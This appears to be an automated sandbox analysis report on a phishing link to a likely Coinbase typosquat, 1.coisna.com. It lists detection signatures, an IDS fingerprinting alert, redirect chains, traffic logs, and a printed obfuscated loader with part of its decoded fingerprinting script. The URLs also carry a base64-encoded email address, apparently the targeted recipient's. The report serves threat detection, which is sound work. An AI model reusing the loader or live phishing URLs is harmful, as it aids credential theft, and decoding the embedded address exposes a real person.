Edit tour

Windows Analysis Report
https://yhp1b2pb.r.us-east-1.awstrack.me/L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH%26m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLsz

Overview

General Information

Sample URL:https://yhp1b2pb.r.us-east-1.awstrack.me/L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv
Analysis ID:1671334
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains suspicious onload / onerror event
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
No HTML title found
Suricata IDS alerts with low severity for network traffic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 5888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2044,i,14520757653537100611,12169281315345894237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://yhp1b2pb.r.us-east-1.awstrack.me/L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH%26m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J%26s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54%26e=%23bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcN/1/010001965e9c7861-e810a570-973d-44ca-98b2-c8b768844478-000000/jtJ9ZQweb9qzOLXcWoJ9KSFZOxc=423" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-22T19:55:11.424201+020020566432Possible Social Engineering Attempted192.168.2.1649713172.233.43.104443TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11... The script uses the 'Function' constructor to execute dynamically generated code, which is a high-risk indicator of potential malicious behavior. This allows for the execution of arbitrary JavaScript, which could lead to data exfiltration, system compromise, or other harmful actions.
Source: https://1.coisna.comJoe Sandbox AI: The URL '1.coisna.com' appears to be a typosquatting attempt on 'coinbase.com'. The character substitution involves replacing 'n' with 'm' and 'b' with 's', which are visually similar and can be easily overlooked by users. The use of '1' as a subdomain is not typical for legitimate purposes and may be intended to mislead users into thinking it is a part of a legitimate service. The domain extension '.com' is the same as the legitimate site, which increases the likelihood of confusion. The structural similarity and the context suggest a high likelihood of typosquatting, as the domain does not suggest any legitimate purpose unrelated to the brand.
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: (new function(atob(this.dataset.digest)))();
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: Number of links: 0
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: Base64 decoded: (function(){var e=[],b={};try{function c(a){if("object"===typeof a&&null!==a){var f={};function n(l){try{var k=a[l];switch(typeof k){case "object":if(null===k)break;case "function":k=k.toString()}f[l]=k}catch(t){e.push(t.message)}}for(var d in a)n(d);try{...
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: HTML title missing
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: No favicon
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: No <meta name="author".. found
Source: https://www.reddit.com/?rdt=54831#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: No <meta name="author".. found
Source: https://1.coisna.com/#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: No <meta name="copyright".. found
Source: https://www.reddit.com/?rdt=54831#bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcNHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 54.162.107.172:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.162.107.172:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.162.107.172:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 44.241.220.131:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.233.43.104:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.178.49.164:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.65.140:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49827 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49921 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.154.8:443 -> 192.168.2.16:49924 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49937 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.22.4.65:443 -> 192.168.2.16:49948 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49956 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.11.120:443 -> 192.168.2.16:49960 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49984 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49985 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49986 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:49987 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:49990 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.178.49.196:443 -> 192.168.2.16:49991 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.178.49.196:443 -> 192.168.2.16:49996 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:50020 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:50030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.16:50046 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.16:50045 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.69.4:443 -> 192.168.2.16:50047 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:50064 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.193.140:443 -> 192.168.2.16:50065 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.140:443 -> 192.168.2.16:50080 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.140:443 -> 192.168.2.16:50083 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 17MB later: 38MB
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: yhp1b2pb.r.us-east-1.awstrack.me to https://urldefense.proofpoint.com/v2/url?u=https-3a__1.coisna.com_&d=dwmfag&c=eugzstcatdllvimen8b7jxrwqof-v5a_cdpgnvfiimm&r=uvtpy5t_qzgla-mv7cbiewwt8nfvdnavi1yrdjvubnst7yjm842-7zz-5laavweh&m=qkxtb-l2u14axgbh1umxeo4pnw7x1t6oobvcwndoht4klszta1uixzy28f5yoo2j&s=uwc5jgtluxsqprsvfzxao8mqbr6fvrrkkt_8-s8ff54&e=#bwljagflbc50b21vckb0yw1wyw11c2v1bs5vcmcn
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: 1.coisna.com to https://reddit.com
Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.16:49713 -> 172.233.43.104:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH%26m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J%26s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54%26e=%23bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcN/1/010001965e9c7861-e810a570-973d-44ca-98b2-c8b768844478-000000/jtJ9ZQweb9qzOLXcWoJ9KSFZOxc=423 HTTP/1.1Host: yhp1b2pb.r.us-east-1.awstrack.meConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v2/url?u=https-3A__1.coisna.com_&d=DwMFAg&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH&m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J&s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54&e= HTTP/1.1Host: urldefense.proofpoint.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 1.coisna.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /files/images/Logo.png HTTP/1.1Host: 1.coisna.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1.coisna.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _cid=0132c76c1ea21d2ec23ebe773a758c79
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: reddit.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://1.coisna.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.reddit.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://1.coisna.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?rdt=54831 HTTP/1.1Host: www.reddit.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://1.coisna.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/icon-4d9be652.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shell-4994f581.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/auth-flow-trigger-client-js-da8b0348.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/viral-community-client-js-4ec0c36b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/xpromo-nsfw-auth-blocking-modal-client-js-df90f341.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/app-selector-client-js-489f074c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/google-one-tap-client-css-b9e7aa9d.css HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
